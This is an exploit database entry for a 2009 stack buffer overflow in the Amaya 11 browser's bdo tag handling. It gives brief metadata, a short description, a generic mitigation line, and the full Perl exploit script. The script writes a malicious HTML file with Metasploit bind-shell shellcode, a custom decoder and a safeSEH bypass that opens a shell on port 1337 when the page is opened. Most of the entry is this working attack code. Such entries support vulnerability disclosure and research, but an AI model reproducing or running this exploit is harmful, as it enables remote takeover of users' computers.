Amaya 11 bdo tag stack overflow

vendor:

Amaya

by:

Rob Carter

9.3

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Amaya

Affected Version From: Amaya 11

Affected Version To: Amaya 11

Patch Exists: YES

Related CWE: N/A

CPE: a:w3c:amaya:11

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista SP1

2009

Amaya 11 bdo tag stack overflow

Amaya 11 bdo tag stack overflow is a vulnerability that allows an attacker to execute arbitrary code on the target system. The exploit bypasses safeSEH by jumping to a pop pop push pop ret sequence in one of the amaya modules that has a constant base address in memory. It then ret's back to the stack, short jump over the overwritten SEH, decodes the first 12 bytes of the shellcode and then runs the repaired shellcode to bind a shell on port 1337.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

#!/usr/bin/perl

#############################################
#
#   Amaya 11 bdo tag stack overflow
#
#   author: Rob Carter (cartrel@hotmail.com)
#
#   targets: windows vista sp1
#
#   modified the alpha-numeric shell-code
#   from metasploit since the first 12 bytes
#   didn't fall within the ASCII range of
#   0x01-0x7f. otherwise my payload would
#   have been corrupted on the stack. wrote
#   a 47-byte decoder to repair the shell-
#   code to its original state.
#
#   this exploit bypasses safeSEH by jumping
#   to a pop pop push pop ret sequence in
#   one of the amaya modules that has a
#   constant base address in memory. ret's
#   back to the stack, short jump over the
#   overwritten SEH, decodes the first 12
#   bytes of the shellcode and then runs
#   the repaired shellcode to bind a shell
#   on port 1337.
#
#   $ perl amaya_sploit.pl > pwn.html
#
#   the author is not responsible for any misuse of
#   this code. it is intended for educational
#   purposes only
#
#############################################

# win32_bind -  EXITFUNC=seh LPORT=1337 Size=709 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
# original first 12 bytes of shellcode:
# "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49".
"\x7f\x01\x01\x7f\x03\x68\x78\x70\x6f\x6f\x3d\x37".
"\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x48".
"\x4e\x46\x46\x42\x46\x42\x4b\x58\x45\x44\x4e\x33\x4b\x38\x4e\x47".
"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x41\x4b\x38".
"\x4f\x45\x42\x32\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58".
"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x4a\x52\x45\x37\x45\x4e\x4b\x48".
"\x4f\x55\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54".
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x48".
"\x49\x48\x4e\x36\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d".
"\x46\x56\x4b\x48\x43\x54\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48".
"\x42\x37\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x30\x50\x45\x4a\x56".
"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x36".
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x43\x4a\x46\x47\x37\x43\x47".
"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e".
"\x4e\x4f\x4b\x33\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x49\x38\x45\x4e".
"\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x55\x4c\x36\x44\x50".
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35".
"\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x45\x43\x35\x43\x55\x43\x54".
"\x43\x45\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x45\x30".
"\x49\x43\x48\x36\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x36\x46\x4a".
"\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x41".
"\x41\x45\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x32".
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d".
"\x4a\x36\x45\x4e\x49\x44\x48\x48\x49\x44\x47\x55\x4f\x4f\x48\x4d".
"\x42\x55\x46\x45\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x36".
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x55".
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x46\x48\x56\x4a\x36\x43\x56".
"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x53\x42\x4c".
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x34\x4e\x32".
"\x43\x49\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
"\x44\x37\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x35\x41\x45\x4c\x56".
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56".
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
"\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
"\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x45\x4f\x4f\x48\x4d".
"\x4f\x4f\x42\x4d\x5a";

$decoder =
"\x5b".			# pop ebx
"\x5b".			# pop ebx
"\x68\x6c\x02\x58\x6c".	# push 0x6c58026c
"\x58".			# pop eax
"\x01\x43\x38".		# add dword ptr[ebx+38],eax
"\x68\x01\x01\x01\x10".	# push 0x10010101
"\x58".			# pop eax
"\x01\x43\x3c".		# add dword ptr[ebx+3c],eax
"\x68\x01\x7f\x7f\x7f".	# push 0x7f7f7f01
"\x58".			# pop eax
"\x01\x43\x3c".		# add dword ptr[ebx+3c],eax
"\x68\x11\x11\x01\x01".	# push 0x01011111
"\x58".			# pop eax
"\x01\x43\x40".		# add dword ptr[ebx+40],eax
"\x68\x7f\x7f\x11\x11".	# push 0x11117f7f
"\x58".			# pop eax
"\x01\x43\x40";		# add dword ptr[ebx+40],eax

$payload =
"<bdo dir=\"".
"A" x 6905 .
"\x74\x06\x41\x41".
"\x51\x55\x03\x10".	# pop - pop - push - pop - ret 0c
$decoder.
"A".
$shellcode.
"\">pwnd!</bdo>";

print $payload;

# milw0rm.com [2009-02-04]